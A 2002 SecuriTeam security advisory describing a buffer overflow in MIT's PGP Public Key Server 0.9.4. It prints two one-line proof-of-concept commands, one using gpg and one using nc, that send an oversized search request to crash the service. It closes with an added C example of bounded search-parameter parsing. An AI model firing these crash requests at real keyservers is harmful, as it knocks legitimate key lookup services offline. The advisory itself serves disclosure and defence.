[UNIX] PGP Public Key Server DoS and Remote Code Execution
From: support@securiteam.com Date: 05/26/02
From: support@securiteam.com To: list@securiteam.com Date: Sun, 26 May 2002 09:11:47 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
PGP Public Key Server DoS and Remote Code Execution
------------------------------------------------------------------------
SUMMARY
MIT's PKS (Public Key Server) <http://www.mit.edu/people/marc/pks/pks.html>
has been found to contain a buffer overflow that allows an attacker to
cause it to execute arbitrary code or, in cases where execution fails, to
cause it to no longer answer legitimate key requests.
DETAILS
Vulnerable systems:
* PGP Public Key Server version 0.9.4
A long enough (> 256b) search request will crash the service. It is as
simple as this:
#gpg --search-keys `perl -e "print 'A'x512"`
Or, without gpg,
#echo -e "GET /pks/lookup?op=index&search=`perl -e "print 'A'x512"`"| nc keyserver-host 11371
Fortunately, in order to cause it to execute code, the provided buffer
must be an isalnum() string (alphanumeric characters only) and must be
able to survive tolower() conversion (conversion to lower case).
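One way to enforce a length limit on the search term before any copy takes place, shown as an added example (not PKS source code and not part of the advisory): it extracts the search value from a /pks/lookup request line into a fixed buffer and rejects oversized input. The 256-byte buffer size is an assumption taken from the "> 256b" figure above, and every name in the code is hypothetical.

```c
#include <ctype.h>
#include <string.h>

#define SEARCH_MAX 256  /* assumed buffer size, from the advisory's "> 256b" */
enum { SEARCH_OK = 0, SEARCH_MISSING = -1, SEARCH_TOO_LONG = -2, SEARCH_BAD_ESCAPE = -3 };

/* Value of one hex digit, or -1 if c is not a hex digit (including NUL). */
static int hexval(int c)
{
    if (isdigit(c)) return c - '0';
    c = tolower(c);
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}

/* Locate "search=" at a parameter boundary ('?' or '&') in the request line. */
static const char *find_search(const char *req)
{
    const char *p = strchr(req, '?');
    while (p != NULL) {
        if (strncmp(p + 1, "search=", 7) == 0) return p + 8;
        p = strchr(p + 1, '&');
    }
    return NULL;
}

/* Percent-decode the search value into out, never writing past out_size. */
int extract_search(const char *req, char *out, size_t out_size)
{
    const char *v = find_search(req);
    size_t n = 0;
    if (out_size == 0) return SEARCH_TOO_LONG;
    if (v == NULL) return SEARCH_MISSING;
    while (*v != '\0' && *v != '&' && *v != ' ' && *v != '\r' && *v != '\n') {
        int c = (unsigned char)*v++;
        if (c == '%') {
            int hi = hexval((unsigned char)v[0]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)v[1]);
            if (lo < 0) return SEARCH_BAD_ESCAPE;  /* truncated or non-hex escape */
            c = hi * 16 + lo;
            v += 2;
        }
        if (n + 1 >= out_size) {   /* keep one byte for the terminator */
            out[0] = '\0';
            return SEARCH_TOO_LONG;
        }
        out[n++] = (char)c;
    }
    out[n] = '\0';
    return SEARCH_OK;
}
```

The length is checked on every decoded byte rather than once on the raw request, so the bound holds regardless of how the value is encoded.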
ADDITIONAL INFORMATION
The information has been provided by Max <rusmir@tula.net>.